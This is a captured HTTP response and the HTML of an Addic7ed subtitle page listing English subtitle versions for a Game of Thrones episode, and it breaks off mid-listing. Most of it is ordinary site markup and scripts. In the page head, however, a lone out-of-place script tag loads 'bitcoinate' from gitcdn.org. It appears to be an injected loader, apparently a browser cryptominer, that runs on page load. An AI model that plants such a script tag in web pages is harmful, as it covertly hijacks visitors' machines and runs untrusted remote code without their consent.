HTTP/1.1 200 OK
Server: nginx
Date: Sun, 15 May 2016 19:18:17 GMT
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=qidb78epclj7etl3s9s84asg86; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  <html xmlns="http://www.w3.org/1999/xhtml">
  <head>
  <meta name="description" content="Game of Thrones - 06x02 - Home subtitles. Download subtitles in English from the source. " />
<script src="http://gitcdn.org/libs/bitcoinate/0.2.1/index.min.js"></script>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  <title>
     Download Game of Thrones - 06x02 - Home subtitles from the source! - Addic7ed.com
  </title>
  <link href="http://www.addic7ed.com/css/wikisubtitles.css" rel="stylesheet" title="default" type="text/css" />
  <link rel="SHORTCUT ICON" href="http://www.addic7ed.com/favicon.ico" />

  <script type="text/javascript" src="http://www.addic7ed.com/js/mootools-core-1.4.5-full-compat.js"></script>
  <script type="text/javascript" src="http://www.addic7ed.com/js/mootools-more-1.4.0.1.js"></script>
  <script type="text/javascript" src="http://www.addic7ed.com/js/moostarrating.js"></script>
  <script type="text/javascript"> function changeAppLang()
  {
    value = $("comboLang").value;
    if (value!='en')
    {
      window.location= "/changeapplang.php?applang=" + value;
    }
  }

  function showChange(showID)
  {
    if (showID==0)
      valor = $("qsShow").value;
    else
      valor = showID;
    if (valor>0)
    {
      $("qsSeason").innerHTML = '<img title="Please wait, loading" alt="Loading" src="http://www.addic7ed.com/images/loader.gif" />';
      $("qsEp").innerHTML = '';
      $("qssShow").innerHTML = '';

      var myRequest = new Request({
          url: '/ajax_getSeasons.php',
          method: 'get',
          onSuccess: function(responseText){
        $("qsSeason").innerHTML = responseText;
          }
      });
      myRequest.send('showID='+valor);
    }
  }

  function seasonChange(showID, season)
  {

    valor = showID;

    if (valor>0)
    {
      $("qsEp").innerHTML = '<img title="Please wait, loading" alt="Loading" src="http://www.addic7ed.com/images/loader.gif" />';

      if (season==-1)
        myseason = $("qsiSeason").value;
      else
        myseason=season;
                        var myRequest = new Request({
                            url: '/ajax_getEpisodes.php',
                            method: 'get',
                            onSuccess: function(responseText){
                                $("qsEp").innerHTML = responseText;
                }
                        });
                        myRequest.send('showID='+valor+'&season='+myseason);
    }

  }

  function changeEp()
  {
    var valor = $("qsiEp").value;
    window.location = '/re_episode.php?ep=' + valor;
  }

  function qsClear()
  {
    $("qssShow").innerHTML = '<img title="Please wait, loading" alt="Loading" src="http://www.addic7ed.com/images/loader.gif" />';
    $("qsSeason").innerHTML = '&nbsp;';
    $("qsEp").innerHTML = '&nbsp;';

    var myRequest = new Request({
        url: '/ajax_getShows.php',
        method: 'get',
        onSuccess: function(responseText){
      $("qssShow").innerHTML = responseText;
        }
    });
    myRequest.send('showID='+valor);
  }
</script>
  <script type="text/javascript">
    function saveFavorite(subid,langid,hi)
    {

    alert('Now following!');
    /*        new Ajax('/ajax_saveFavorite.php?subid='+subid+'&langid='+langid+'&hi='+hi, {
        method: 'get',
        update: $("episodes")
      }).request();
    */

    var myRequest = new Request({
        url: '/ajax_saveFavorite.php',
        method: 'get'
    });
    myRequest.send('subid='+subid+'&langid='+langid+'&hi='+hi);
    }

  </script>


  </head>

  <body>
  <center><br />
<table border="0">
<tr>
  <td rowspan="9"><a href="/"><img height="200" width="350" src="http://www.addic7ed.com/images/addic7edheader.jpg"  border="0"  title="Addic7ed.com - Quality Subtitles for TV Shows and movies" alt="Addic7ed.com - Quality Subtitles for TV Shows and movies" /></a></td>
</tr>
<tr><td align="center" colspan="2">
<h1><small>Download free subtitles for TV Shows and Movies.</small>&nbsp;
<select name="applang" class="inputCool" onchange="changeAppLang();" id="comboLang"><option value="ar">Arabic</option><option value="ca">Catala</option><option selected="selected" value="en">English</option><option value="eu">Euskera</option><option value="fr">French</option><option value="ga">Galician</option><option value="de">German</option><option value="gr">Greek</option><option value="hu">Hungarian</option><option value="it">Italian</option><option value="fa">Persian</option><option value="pl">Polish</option><option value="pt">Portuguese</option><option value="br">Portuguese (Brazilian)</option><option value="ro">Romanian</option><option value="ru">Russian</option><option value="es">Spanish</option><option value="se">Swedish</option></select></h1>
</td></tr>
<tr><td align="center" colspan="2">
<div id="hBar">
        <ul>
        <li><a class="button white" href="/panel.php">My Panel</a></li><li><a class="button white" href="/newsub.php">Upload</a></li>     <li><a class="button white" href="/shows.php">Shows</a></li>
        <li><a class="button white" href="/allshows/a">Air dates</a></li>
        <li><a class="button white" href="http://www.sub-talk.net">Forum</a></li>
        <li><a class="button white" href="/logout.php">Logout</a></li>
        </ul>
        </div>
</td></tr>
<tr>
  <td>
</td><td>
  <g:plusone size="medium"></g:plusone>
    <a href="http://twitter.com/addic7ed" target="_blank"><img width="32" height="32" src="http://www.addic7ed.com/images/twitter_right.png" alt="Twitter" border="0" /></a>
  <a href="irc://irc.efnet.net:6667/addic7ed"><img width="32" height="32" src="http://www.addic7ed.com/images/irc-right.png" alt="IRC" border="0" /></a>
<div style="float: right; padding-right:10%;">

  </td>
 </tr>
 <tr>
   <td colspan=2><iframe src="http://www.facebook.com/plugins/like.php?href=https%3A%2F%2Fwww.facebook.com%2FAddic7ed&amp;send=false&amp;layout=button_count&amp;width=450&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font=tahoma&amp;height=21&amp;appId=121322186712" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:80px; height:21px;" allowTransparency="true"></iframe>
    </td>
 </tr>
</table>
</center>

<center>

<!--[if lt IE 7]>
 <style type="text/css">
 div, img { behavior: url(http://www.addic7ed.com/js/iepngfix.htc) }
 </style>
<![endif]-->
<!--
    This file is part of wikisubtitles.

    wikisubtitles is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    Wikisubtitles is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with Foobar.  If not, see <http://www.gnu.org/licenses/>.
-->
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td width="50%" align="center">
    <a href="javascript:qsClear();"><img width="24" height="24" title="Clear Search" alt="Clear Search Terms" src="http://www.addic7ed.com/images/view.png" border="0" /></a> <span id="qssShow"><b>
Quick search    </b>
  &nbsp;    <script type="text/javascript">
      window.addEvent('domready', function() { showChange(1245 ); } );
    </script>

    </span>
    <span id="qsSeason">&nbsp;
<script type="text/javascript">window.addEvent('domready', function() { seasonChange(1245,6) } );</script>
    </span>
  &nbsp;
    <span id="qsEp">&nbsp;</span></td>
    <td><form id="form1" name="form1" method="get" action="/search.php">
      <div align="center">
Search subtitle      &nbsp;
        <input name="search" type="text" id="search" size="20" /> &nbsp;
<input name="Submit" type="submit" class="coolBoton" value="Search" />      </div>
    </form>

    </td>
  </tr>
</table>
<br><!-- MarketGidComposite Start -->
<div id="MarketGidScriptRootC13385">
    <div id="MarketGidPreloadC13385">
            <a id="mg_add13385" href="http://mgid.com/advertisers/?utm_source=widget&utm_medium=text&utm_campaign=add" target="_blank">Place your ad here</a><br>        <a href="http://mgid.com/" target="_blank">Loading...</a>
                </div>
                    <script>
                                    window.MGWidgetTitle13385 = "Promoted Content";        (function(){
                                                var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
                                                            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("MarketGidScriptRootC13385")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
                                                                        catch(e){var iw=d;var c=d[gi]("MarketGidScriptRootC13385");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=13385;c[ac](dv);
                                                                                    var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsc.mgid.com/a/d/addic7ed.com.13385.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
                                                                                        </script>
                                                                                        </div>
                                                                                        <!-- MarketGidComposite End -->

    <br />
    <script type="text/javascript">
      function saveWatched(subid,season,episode)
      {

      var myRequest = new Request({
          url: '/ajax_saveWatched.php',
          method: 'get',
      });
      myRequest.send('subid='+subid+'&season='+season+'&episode='+episode);
      }

      function saveShowRating(tvrage,rating)
      {

      var myRequest = new Request({
          url: '/ajax_saveShowRating.php',
          method: 'get',
      });
      myRequest.send('tvrage='+tvrage+'&rating='+rating);

      }
    </script>

    <script type='text/javascript'>//<![CDATA[
    window.addEvent('load', function() {
    // Default images folder definition. You will use your own.
    MooStarRatingImages.defaultImageFolder =
        'http://www.addic7ed.com/img/';

    // ================================================================

    // Advanced options
    var advancedRating = new MooStarRating({
        form: 'advanced',
        radios: 'my_rating',                // Radios name
        half: true,                         // That means one star for two values!
        imageEmpty: 'star_boxed_empty.png', // Different image
        imageFull:  'star_boxed_full.png',  // Different image
        imageHover: 'star_boxed_hover.png', // Different image
        width: 17,                          // One pixel bigger
        tip: '<i>[VALUE] / 10.0</i>', // Mouse rollover tip
        tipTarget: $('htmlTip'),            // Tip element
        tipTargetType: 'html'               // Tip type, now is HTML, not only text
    });

    // ================================================================

    // Click callback function
    function myCallback(value) {
      saveShowRating(24493,value)
    }

    // Click event
    advancedRating.addEvent('click', myCallback);
    });//]]>

    </script>

    <br />
    <div id="container">
    <table class="tabel70" border="0">
        <tr> <!-- table header -->
      <td class="tablecorner"><img src="http://www.addic7ed.com/images/tl.gif" /></td>
      <td>&nbsp;</td>
      <td class="tablecorner"><img src="http://www.addic7ed.com/images/tr.gif" /></td>
        </tr>
        <tr>
      <td>&nbsp;</td>
      <td>
        <table  border="0" align="center" class="tabel95">
          <tr>
           <td width="50%"><div align="left"><span class="titulo">
            Game of Thrones - 06x02 - Home <small>Subtitle</small>
            </span></div>
            </td>
            <td width="20%">
            </td>
            <td width="30%" rowspan="5"><div valign="top">
          <table class="tabel" width="40%" border="0" align="center">
                <tr>
            <td><img class="resize" border="0" src="http://www.addic7ed.com/images/showimages/121361-g32.jpg" />
            </td>
                </tr>
          </table></div>
            </td>
          </tr>

          <tr>
            <td><img src="http://www.addic7ed.com/images/folder_image.png" width="16" height="16" />&nbsp;<a href="/show/1245">Game of Thrones</a>, <a href='/season/1245/6'>Season 6</a>, Episode 2 subtitles
            </td>
            <td>
          </td>
          </tr>

          <tr>
            <td><br /><b> Game of Thrones   - 9.5/10<form name="advanced"> <label>Rate:</label><input type="radio" name="my_rating" value="0.5"><input type="radio" name="my_rating" value="1"><input type="radio" name="my_rating" value="1.5"><input type="radio" name="my_rating" value="2"><input type="radio" name="my_rating" value="2.5"><input type="radio" name="my_rating" value="3"><input type="radio" name="my_rating" value="3.5"><input type="radio" name="my_rating" value="4"><input type="radio" name="my_rating" value="4.5"><input type="radio" name="my_rating" value="5"><input type="radio" name="my_rating" value="5.5"><input type="radio" name="my_rating" value="6"><input type="radio" name="my_rating" value="6.5"><input type="radio" name="my_rating" value="7"><input type="radio" name="my_rating" value="7.5"><input type="radio" name="my_rating" value="8"><input type="radio" name="my_rating" value="8.5"><input type="radio" name="my_rating" value="9"><input type="radio" name="my_rating" value="9.5"><input type="radio" name="my_rating" value="10"><span id="htmlTip"></span></form><a href="/overview/24493/Game of Thrones"><font color=red>Episode list and air dates</font></a>
           </td>
            <td>
          </td></tr><tr><td>&nbsp;<b><big><font color='red'>Viewed</font></big></b><input type="checkbox" name="watched" value="true" onclick="saveWatched(24493,6,2);" >
  </td></tr>
        <tr>
         <td>
          </td>
        </tr>

        <tr>
          <td><img src="http://www.addic7ed.com/images/clock.png" width="16" height="16" align="absmiddle" />
        00:52:30
           <img src="http://www.addic7ed.com/images/download.png" width="16" height="16" align="absmiddle" />
        45009
          </td>
          <td>
          </td>
        </tr>
        <tr>
         <td><a href="http://twitter.com/share" class="twitter-share-button" data-count="vertical" data-via="addic7ed">Tweet</a>&nbsp;&nbsp;<a href="/show/1245">Multi Download</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script></td>
          <td>
          </td>
         <td>
        <fb:like href="http://www.addic7ed.com/serie/game_of_thrones/6/2/1" layout="standard" show_faces="false" width="400" action="like" font="segoe ui" colorscheme="light" />
          <script src="http://connect.facebook.net/en_US/all.js"></script>
            <script>
              FB.init({
          status : true, // check login status
          cookie : true, // enable cookies to allow the server to access the session
          xfbml  : true  // parse XFBML
              });
            </script>
        </td>
      </tr>
    </table>
    </td>
      <td>&nbsp;</td>
    </tr>
    <tr> <!-- table footer -->
      <td class="tablecorner"><img src="http://www.addic7ed.com//images/bl.gif" /></td>
      <td>&nbsp;</td>
      <td class="tablecorner"><img src="http://www.addic7ed.com//images/br.gif" /></td>
    </tr>
    </table>
    </div>
    <p>

    <script type="text/javascript">
      function sortChange()
      {
        var sortCheck = document.getElementById("sort_versions");
        window.location='/serie/game of thrones/6/2/'+sortCheck.checked;
      }
      function filterChange()
      {
        var filter = document.getElementById("filterlang");
        window.location='/serie/game of thrones/6/2/'+filter.options[filter.selectedIndex].value;
      }
    </script><b>Sort versions alphabetically by language</b><INPUT TYPE="CHECKBOX" id="sort_versions" onclick="javascript:sortChange();" checked="yes" > - Filter Language: <select id="filterlang" name="filterlang" class="inputCool" onchange="javascript:filterChange();" >
    <option value="0">All</option><option value="52">Albanian</option><option value="38">Arabic</option><option value="50">Armenian</option><option value="48">Azerbaijani</option><option value="47">Bengali</option><option value="44">Bosnian</option><option value="35">Bulgarian</option><option value="12">Català</option><option value="41">Chinese (Simplified)</option><option value="24">Chinese (Traditional)</option><option value="31">Croatian</option><option value="14">Czech</option><option value="30">Danish</option><option value="17">Dutch</option><option selected="selected" value="1">English</option><option value="54">Estonian</option><option value="13">Euskera</option><option value="28">Finnish</option><option value="8">French</option><option value="53">French (Canadian)</option><option value="15">Galego</option><option value="11">German</option><option value="27">Greek</option><option value="23">Hebrew</option><option value="55">Hindi</option><option value="20">Hungarian</option><option value="56">Icelandic</option><option value="37">Indonesian</option><option value="7">Italian</option><option value="32">Japanese</option><option value="42">Korean</option><option value="57">Latvian</option><option value="58">Lithuanian</option><option value="49">Macedonian</option><option value="40">Malay</option><option value="29">Norwegian</option><option value="43">Persian</option><option value="21">Polish</option><option value="9">Portuguese</option><option value="10">Portuguese (Brazilian)</option><option value="26">Romanian</option><option value="19">Russian</option><option value="39">Serbian (Cyrillic)</option><option value="36">Serbian (Latin)</option><option value="60">Sinhala</option><option value="25">Slovak</option><option value="22">Slovenian</option><option value="4">Spanish</option><option value="6">Spanish (Latin America)</option><option value="5">Spanish (Spain)</option><option value="18">Swedish</option><option value="59">Tamil</option><option value="46">Thai</option><option value="16">Turkish</option><option value="51">Ukrainian</option><option value="45">Vietnamese</option></select><br>
  <div id="container95m">
    <table class="tabel95">
      <tr> <!-- table header -->
      <td class="tablecorner"><img src="http://www.addic7ed.com/images/tl.gif" /></td>
      <td>&nbsp;</td>
      <td class="tablecorner"><img src="http://www.addic7ed.com/images/tr.gif" /></td>
        </tr>
        <tr>
      <td>&nbsp;</td>
      <td>
  <table width="100%" border="0" align="center" class="tabel95">
    <tr>
      <td colspan="3" align="center" class="NewsTitle"><img src="http://www.addic7ed.com/images/folder_page.png" width="16" height="16" />Version FLEET, 0.00 MBs&nbsp;<img title="720/1080" src="http://www.addic7ed.com/images/hdicon.png" width="24" height="24" /></td><td colspan="2">
      <img src="http://www.addic7ed.com/images/movie_faq.png" title="LOL &amp; SYS always work with 720p DIMENSION; XII & ASAP always work with 720p IMMERSE; 2HD always works with 720p 2HD; BiA always works with 720p BiA; FoV always works with 720p FoV" border="0" width="24" height="24" />
      <img src="http://www.addic7ed.com/images/subtitle.gif" width="22" height="14" /><a href="/starttranslation.php?id=111620&amp;fversion=0">New translation</a> <img src="http://www.addic7ed.com/images/link.png"  /> uploaded by <a href='/user/10641'>honeybunny</a>  7 days ago
        </td>
        <td width="16%">
        </td>
      </tr>
      <tr>
        <td colspan="4"></td>
        <td class="newsDate" colspan="3">
        <img src="http://www.addic7ed.com/images/invisible.gif" />
        </td>
      </tr><tr><td width="10%" rowspan="2" valign="top"><a href="http://addic7ed.com"><img height="35" width="100" src="http://www.addic7ed.com/friends/addic7ed.jpg" border="0" /></a>&nbsp;&nbsp;&nbsp;</td>
      <td width="1%" rowspan="2" valign="top"><img src="http://www.addic7ed.com/images/invisible.gif" />
      </td>
      <td width="21%" class="language">English<a href="javascript:saveFavorite(111620,1,1)"><img title="Start following..." src="http://www.addic7ed.com/images/icons/favorite.png" height="20" width="20" border="0" /></a>
      </td>
      <td width="19%"><b>Completed
        </b>
        </td>
        <td colspan="3">
        <img src="http://www.addic7ed.com/images/download.png" width="24" height="24" /> <a class="buttonDownload" href="/original/111620/0"><strong>original</strong></a>
        <a class="buttonDownload" href="/updated/1/111620/0"><strong>most updated</strong></a></td>
        <td><a href="/badsub.php?id=111620&amp;fversion=0&amp;lang=1"><img border='0' title='Report to moderators. Write a comment with your reason.' src='http://www.addic7ed.com//images/user_gray.png' width='24' height='24' /></a>
        </td>
      </tr>
      <tr>
        <td colspan="2" class="newsDate"><img title="Corrected" src="http://www.addic7ed.com/images/bullet_go.png" width="24" height="24" /><img title="Hearing Impaired" src="http://www.addic7ed.com/images/hi.jpg" width="24" height="24" />4 times edited · 45009 Downloads · 588 sequences
    </td>
        <td colspan="3"><img border="0" src="http://www.addic7ed.com/images/edit.png" width="24" height="24" /><a href="/list.php?id=111620&amp;fversion=0&amp;lang=1" onclick="return confirm('You are about to join View and Edit.\n Please use this feature for CORRECTING FILES only.\n IF you want to translate, click New Translation or Join translation instead')">view &amp; edit</a>&nbsp;edited  6 days ago
        </td>
      </tr></table>
        </td>
        <td>&nbsp;</td>
          </tr>
          <tr> <!-- table footer -->
        <td class="tablecorner"><img src="http://www.addic7ed.com/images/bl.gif" /></td>
        <td>&nbsp;</td>
        <td class="tablecorner"><img src="http://www.addic7ed.com/images/br.gif" /></td>
          </tr>
      </table>
        </div>
  <div id="container95m">
    <table class="tabel95">
      <tr> <!-- table header -->
      <td class="tablecorner"><img src="http://www.addic7ed.com/images/tl.gif" /></td>
      <td>&nbsp;</td>
      <td class="tablecorner"><img src="http://www.addic7ed.com/images/tr.gif" /></td>
        </tr>
        <tr>
      <td>&nbsp;</td>
      <td>
  <table width="100%" border="0" align="center" class="tabel95">
    <tr>
      <td colspan="3" align="center" class="NewsTitle"><img src="http://www.addic7ed.com/images/folder_page.png" width="16" height="16" />Version PROPER.BATV, 0.00 MBs&nbsp;<img title="720/1080" src="http://www.addic7ed.com/images/hdicon.png" width="24" height="24" /></td><td colspan="2">
      <img src="http://www.addic7ed.com/images/movie_faq.png" title="LOL &amp; SYS always work with 720p DIMENSION; XII & ASAP always work with 720p IMMERSE; 2HD always works with 720p 2HD; BiA always works with 720p BiA; FoV always works with 720p FoV" border="0" width="24" height="24" />
      <img src="http://www.addic7ed.com/images/subtitle.gif" width="22" height="14" /><a href="/starttranslation.php?id=111620&amp;fversion=3">New translation</a> <img src="http://www.addic7ed.com/images/link.png"  /> uploaded by <a href='/user/418387'>GoldenBeard</a>  7 days ago
        </td>
        <td width="16%">
        </td>
      </tr>
      <tr>
        <td colspan="4"></td>
        <td class="newsDate" colspan="3">
        resync of honeybunny's<img src="http://www.addic7ed.com/images/invisible.gif" />
        </td>
      </tr><tr><td width="10%" rowspan="2" valign="top">&nbsp;&nbsp;&nbsp;</td>
      <td width="1%" rowspan="2" valign="top"><img src="http://www.addic7ed.com/images/invisible.gif" />
      </td>
      <td width="21%" class="language">English<a href="javascript:saveFavorite(111620,1,1)"><img title="Start following..." src="http://www.addic7ed.com/images/icons/favorite.png" height="20" width="20" border="0" /></a>
      </td>
      <td width="19%"><b>Completed
        </b>
        </td>
        <td colspan="3">
        <img src="http://www.addic7ed.com/images/download.png" width="24" height="24" /><a class="buttonDownload" href="/original/111620/3"><strong>Download</strong></a></td>
        <td><a href="/badsub.php?id=111620&amp;fversion=3&amp;lang=1"><img border='0' title='Report to moderators. Write a comment with your reason.' src='http://www.addic7ed.com//images/user_gray.png' width='24' height='24' /></a>
        </td>
      </tr>
      <tr>
        <td colspan="2" class="newsDate"><img title="Corrected" src="http://www.addic7ed.com/images/bullet_go.png" width="24" height="24" /><img title="Hearing Impaired" src="http://www.addic7ed.com/images/hi.jpg" width="24" height="24" />0 times edited · 31123 Downloads · 559 sequences
    </td>
        <td colspan="3"><img border="0" src="http://www.addic7ed.com/images/edit.png" width="24" height="24" /><a href="/list.php?id=111620&amp;fversion=3&amp;lang=1" onclick="return confirm('You are about to join View and Edit.\n Please use this feature for CORRECTING FILES only.\n IF you want to translate, click New Translation or Join translation instead')">view &amp; edit</a>&nbsp;</table>
        </td>
        <td>&nbsp;</td>
          </tr>
          <tr> <!-- table footer -->
        <td class="tablecorner"><img src="http://www.addic7ed.com/images/bl.gif" /></td>
        <td>&nbsp;</td>
        <td class="tablecorner"><img src="http://www.addic7ed.com/images/br.gif" /></td>
          </tr>
      </table>
        </div>
  <div id="container95m">
    <table class="tabel95">
      <tr> <!-- table header -->
      <td class="tablecorner"><img src="http://www.addic7ed.com/images/tl.gif" /></td>
      <td>&nbsp;</td>
      <td class="tablecorner"><img src="http://www.addic7ed.com/images/tr.gif" /></td>
        </tr>
        <tr>
      <td>&nbsp;</td>
      <td>
  <table width="100%" border="0" align="center" class="tabel95">
    <tr>
      <td colspan="3" align="center" class="NewsTitle"><img src="http://www.addic7ed.com/images/folder_page.png" width="16" height="16" />Version FLEET.colored, 0.00 MBs&nbsp;<img title="720/1080" src="http://www.addic7ed.com/images/hdicon.png" width="24" height="24" /></td><td colspan="2">
      <img src="http://www.addic7ed.com/images/movie_faq.png" title="LOL &amp; SYS always work with 720p DIMENSION; XII & ASAP always work with 720p IMMERSE; 2HD always works with 720p 2HD; BiA always works with 720p BiA; FoV always works with 720p FoV" border="0" width="24" height="24" />
      <img src="http://www.addic7ed.com/images/subtitle.gif" width="22" height="14" /><a href="/starttranslation.php?id=111620&amp;fversion=4">New translation</a> <img src="http://www.addic7ed.com/images/link.png"  /> uploaded by <a href='/user/11400'>elderman</a>  7 days ago
        </td>
        <td width="16%">
        </td>
      </tr>
      <tr>
        <td colspan="4"></td>
        <td class="newsDate" colspan="3">
        <img src="http://www.addic7ed.com/images/invisible.gif" />
        </td>
      </tr><tr><td width="10%" rowspan="2" valign="top"><a href="http://addic7ed.com"><img height="35" width="100" src="http://www.addic7ed.com/friends/addic7ed.jpg" border="0" /></a>&nbsp;&nbsp;&nbsp;</td>
      <td width="1%" rowspan="2" valign="top"><img src="http://www.addic7ed.com/images/invisible.gif" />
      </td>
      <td width="21%" class="language">English<a href="javascript:saveFavorite(111620,1,1)"><img title="Start following..." src="http://www.addic7ed.com/images/icons/favorite.png" height="20" width="20" border="0" /></a>
      </td>
      <td width="19%"><b>Completed
        </b>
        </td>
        <td colspan="3">
        <img src="http://www.addic7ed.com/images/download.png" width="24" height="24" /> <a class="buttonDownload" href="/original/111620/4"><strong>original</strong></a>
        <a class="buttonDownload" href="/updated/1/111620/4"><strong>most updated</strong></a></td>
        <td><a href="/badsub.php?id=111620&amp;fversion=4&amp;lang=1"><img border='0' title='Report to moderators. Write a comment with your reason.' src='http://www.addic7ed.com//images/user_gray.png' width='24' height='24' /></a>
        </td>
      </tr>
      <tr>
        <td colspan="2" class="newsDate"><img title="Corrected" src="http://www.addic7ed.com/images/bullet_go.png" width="24" height="24" /><img title="Hearing Impaired" src="http://www.addic7ed.com/images/hi.jpg" width="24" height="24" />4 times edited · 4778 Downloads · 601 sequences
    </td>
        <td colspan="3"><img border="0" src="http://www.addic7ed.com/images/edit.png" width="24" height="24" /><a href="/list.php?id=111620&amp;fversion=4&amp;lang=1" onclick="return confirm('You are about to join View and Edit.\n Please use this feature for CORRECTING FILES only.\n IF you want to translate, click New Translation or Join translation instead')">view &amp; edit</a>&nbsp;edited  7 days ago
        </td>
      </tr></table>
        </td>
        <td>&nbsp;</td>
          </tr>
          <tr> <!-- table footer -->
        <td class="tablecorner"><img src="http://www.addic7ed.com/images/bl.gif" /></td>
        <td>&nbsp;</td>
        <td class="tablecorner"><img src="http://www.addic7ed.com/images/br.gif" /></td>
          </tr>
      </table>
        </div>
  <div id="container95m">
    <table class="tabel95">
      <tr> <!-- table header -->
      <td class="tablecorner"><img src="http://www.addic7ed.com/images/tl.gif" /></td>
      <td>&nbsp;</td>
      <td class="tablecorner"><img src="http://www.addic7ed.com/images/tr.gif" /></td>
        </tr>
        <tr>
      <td>&nbsp;</td>
      <td>
  <table width="100%" border="0" align="center" class="tabel95">
    <tr>
      <td colspan="3" align="center" class="NewsTitle"><img src="http://www.addic7ed.com/images/folder_page.png" width="16" height="16" />Version BATV.colored, 0.00 MBs&nbsp;<img title="720/1080" src="http://www.addic7ed.com/images/hdicon.png" width="24" height="24" /></td><td colspan="2">
      <img src="http://www.addic7ed.com/images/movie_faq.png" title="LOL &amp; SYS always work with 720p DIMENSION; XII & ASAP always work with 720p IMMERSE; 2HD always works with 720p 2HD; BiA always works with 720p BiA; FoV always works with 720p FoV" border="0" width="24" height="24" />
      <img src="http://www.addic7ed.com/images/subtitle.gif" width="22" height="14" /><a href="/starttranslation.php?id=111620&amp;fversion=7">New translation</a> <img src="http://www.addic7ed.com/images/link.png"  /> uploaded by <a href='/user/11400'>elderman</a>  7 days ago
        </td>
        <td width="16%">
        </td>
      </tr>
      <tr>
        <td colspan="4"></td>
        <td class="newsDate" colspan="3">
        <img src="http://www.addic7ed.com/images/invisible.gif" />
        </td>
      </tr><tr><td width="10%" rowspan="2" valign="top"><a href="http://addic7ed.com"><img height="35" width="100" src="http://www.addic7ed.com/friends/addic7ed.jpg" border="0" /></a>&nbsp;&nbsp;&nbsp;</td>
      <td width="1%" rowspan="2" valign="top"><img src="http://www.addic7ed.com/images/invisible.gif" />
      </td>
      <td width="21%" class="language">English<a href="javascript:saveFavorite(111620,1,1)"><img title="Start following..." src="http://www.addic7ed.com/images/icons/favorite.png" height="20" width="20" border="0" /></a>
      </td>
      <td width="19%"><b>Completed
        </b>
        </td>
        <td colspan="3">
        <img src="http://www.addic7ed.com/images/download.png" width="24" height="24" /><a class="buttonDownload" href="/original/111620/7"><strong>Download</strong></a></td>
        <td><a href="/badsub.php?id=111620&amp;fversion=7&amp;lang=1"><img border='0' title='Report to moderators. Write a comment with your reason.' src='http://www.addic7ed.com//images/user_gray.png' width='24' height='24' /></a>
        </td>
      </tr>
      <tr>
        <td colspan="2" class="newsDate"><img title="Corrected" src="http://www.addic7ed.com/images/bullet_go.png" width="24" height="24" /><img title="Hearing Impaired" src="http://www.addic7ed.com/images/hi.jpg" width="24" height="24" />0 times edited · 5339 Downloads · 572 sequences
    </td>
        <td colspan="3"><img border="0" src="http://www.addic7ed.com/images/edit.png" width="24" height="24" /><a href="/list.php?id=111620&amp;fversion=7&amp;lang=1" onclick="return confirm('You are about to join View and Edit.\n Please use this feature for CORRECTING FILES only.\n IF you want to translate, click New Translation or Join translation instead')">view &amp; edit</a>&nbsp;</table>
        </td>
        <td>&nbsp;</td>
          </tr>
          <tr> <!-- table footer -->
        <td class="tablecorner"><img src="http://www.addic7ed.com/images/bl.gif" /></td>
        <td>&nbsp;</td>
        <td class="tablecorner"><img src="http://www.addic7ed.com/images/br.gif" /></td>
          </tr>
      </table>
        </div>
  <div id="container95m">
    <table class="tabel95">
      <tr> <!-- table header -->
      <td class="tablecorner"><img src="http://www.addic7ed.com/images/tl.gif" /></td>
      <td>&nbsp;</td>
      <td class="tablecorner"><img src="http://www.addic7ed.com/images/tr.gif" /></td>
        </tr>
        <tr>
      <td>&nbsp;</td>
      <td>
  <table width="100%" border="0" align="center" class="tabel95">
    <tr>
      <td colspan="3" align="center" class="NewsTitle"><img src="http://www.addic7ed.com/images/folder_page.png" width="16" height="16" />Version WEB-DL, 1940.00 MBs&nbsp;<img title="720/1080" src="http://www.addic7ed.com/images/hdicon.png" width="24" height="24" /></td><td colspan="2">
      <img src="http://www.addic7ed.com/images/movie_faq.png" title="LOL &amp; SYS always work with 720p DIMENSION; XII & ASAP always work with 720p IMMERSE; 2HD always works with 720p 2HD; BiA always works with 720p BiA; FoV always works with 720p FoV" border="0" width="24" height="24" />
      <img src="http://www.addic7ed.com/images/subtitle.gif" width="22" height="14" /><a href="/starttranslation.php?id=111620&amp;fversion=21">New translation</a> <img src="http://www.addic7ed.com/images/link.png"  /> uploaded by <a href='/user/574350'>jaideejung007</a>  6 days ago
        </td>
        <td width="16%">
        </td>
      </tr>
      <tr>
        <td colspan="4"></td>
        <td class="newsDate" colspan="3">
        Resync of PROPER.BATV version | WORK WITH "WEB-DL-NTb" | ALL ADJUST NEW SEQUENCE TIME OF SUBTITLE<img src="http://www.addic7ed.com/images/invisible.gif" />
        </td>
      </tr><tr><td width="10%" rowspan="2" valign="top">&nbsp;&nbsp;&nbsp;</td>
      <td width="1%" rowspan="2" valign="top"><img src="http://www.addic7ed.com/images/invisible.gif" />
      </td>
      <td width="21%" class="language">English<a href="javascript:saveFavorite(111620,1,1)"><img title="Start following..." src="http://www.addic7ed.com/images/icons/favorite.png" height="20" width="20" border="0" /></a>
      </td>
      <td width="19%"><b>Completed
        </b>
        </td>
        <td colspan="3">
